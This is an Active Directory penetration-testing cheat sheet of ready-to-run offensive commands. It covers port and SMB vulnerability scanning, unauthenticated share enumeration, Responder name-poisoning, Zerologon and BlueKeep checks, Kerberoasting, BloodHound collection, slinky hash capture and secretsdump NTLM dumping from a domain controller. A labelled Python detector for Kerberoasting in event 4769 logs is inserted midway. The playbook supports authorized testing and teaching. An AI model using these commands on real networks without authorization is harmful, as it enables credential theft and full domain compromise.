Run nmap
mkdir scan
nmap -T4 -iL scope.txt -Pn -p21,22,139,445,3389,88,389,135,1433,3306 --open -vv -oG scan/alive.txt
nmap -T4 -sV --script=default,banner,vulners -iL scope.txt --top-ports 3700 -vv -oA scan/full-tcp-res
nmap -T4 -sV -p445 -Pn -iL scope.txt -vv --script smb-security-mode,smb-vuln-ms17-010 -oA scan/smb-scan
Run cme on all shares, find open/unauthenticated ones
cme smb smb-ips.txt -u '' -p '' --shares
Discover HTTP services
NetBIOS/LLMNR Spoofing
sudo python2 Responder.py -I eth0 -wrFP
DC Sync / Zerologon
git clone https://github.com/SecuraBV/CVE-2020-1472
pip install -r requirements.txt
./zerologon_tester.py EXAMPLE-DC 1.2.3.4
Bluekeep
git clone https://github.com/robertdavidgraham/rdpscan.git
make
rdpscan 192.168.1.1-192.168.1.255
Password spray the DC
Checking default credentials embedded devices
Checking "dumb ports"
Kerberoasting
python3 GetUserSPNs.py -request -dc-ip <dc ip> acme.corp/JOHNNY.WALKER -outputfile tickets.txt
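On the DC side the step above shows up in Security event 4769 as a burst of RC4 (etype 0x17) service-ticket requests for distinct user service accounts from one principal. The following is an added detection example for the blue-team counterpart of this step; it is not part of the cheat sheet, uses constructed log lines, and assumes a flattened key=value field layout that must be mapped to your SIEM's 4769 schema:

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records in flattened key=value form (assumed field names; real 4769 events are EVTX/XML).
SAMPLE_4769 = """\
2024-05-01T09:00:01 EventID=4769 Account=johnny.walker@ACME.CORP Service=sqlsvc EncType=0x17 Ip=10.1.2.3
2024-05-01T09:00:02 EventID=4769 Account=johnny.walker@ACME.CORP Service=httpsvc EncType=0x17 Ip=10.1.2.3
2024-05-01T09:00:03 EventID=4769 Account=johnny.walker@ACME.CORP Service=backupsvc EncType=0x17 Ip=10.1.2.3
2024-05-01T09:00:04 EventID=4769 Account=johnny.walker@ACME.CORP Service=WS01$ EncType=0x17 Ip=10.1.2.3
2024-05-01T09:00:05 EventID=4769 Account=alice@ACME.CORP Service=sqlsvc EncType=0x12 Ip=10.1.2.9
2024-05-01T10:30:00 EventID=4769 Account=bob@ACME.CORP Service=httpsvc EncType=0x17 Ip=10.1.2.7
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) EventID=4769 Account=(?P<account>\S+) Service=(?P<service>\S+) "
    r"EncType=(?P<enc>0x[0-9a-fA-F]+) Ip=(?P<ip>\S+)$"
)
RC4_HMAC = 0x17  # roasting tools ask for RC4 tickets because they crack far faster than AES ones

def parse_4769(text):
    """Parse flattened 4769 lines into dicts; lines that do not match the layout are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            d = m.groupdict()
            d["ts"] = datetime.fromisoformat(d["ts"])
            d["enc"] = int(d["enc"], 16)
            events.append(d)
    return events

def find_kerberoast_candidates(events, min_spns=3, window=timedelta(minutes=5)):
    """Return {account: sorted distinct service names} for accounts that requested
    RC4 tickets for >= min_spns distinct non-machine services inside one time window."""
    per_account = defaultdict(list)
    for e in events:
        # Machine accounts (trailing $) and krbtgt are routine RC4 noise, not roastable targets
        if e["enc"] == RC4_HMAC and not e["service"].endswith("$") and e["service"].lower() != "krbtgt":
            per_account[e["account"]].append(e)
    flagged = {}
    for account, evs in per_account.items():
        evs.sort(key=lambda e: e["ts"])
        for i, start in enumerate(evs):
            in_window = {e["service"] for e in evs[i:] if e["ts"] - start["ts"] <= window}
            if len(in_window) >= min_spns:
                flagged[account] = sorted(in_window)
                break
    return flagged
```

Tune min_spns and window against a baseline of your environment; service accounts that legitimately hold many SPNs and still allow RC4 are the usual false-positive source and are also the ones worth migrating to AES-only keys.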
Bloodhound
bloodhound-python -u "USER" -p "PASS" --dns-tcp -ns <dc ip> -dc somedc.acme.corp -d acme.corp -c all
Slinky - Expand Access
cme smb hosts.txt -u 'user' -p 'pass' -M slinky -o NAME=0123
Shares
cme smb hosts.txt -u 'user' -p 'pass' --shares | tee auth-user-1
cat auth-user-1 | grep -ai "read\|write"
smbclient.py user@ip
# You can also try ftp shares with these creds with limited success.
# Perhaps also ssh ;)
Dump Passwords & Crack
python3 secretsdump.py -just-dc-ntlm CORP/[email protected] | tee -a dump
cme smb ips.txt -u 'user' -p 'pass' --pass-pol # for screenshot for finding
WADComs - An interactive cheat sheet, containing a curated list of offensive security tools and their respective commands, to be used against Windows/AD environments.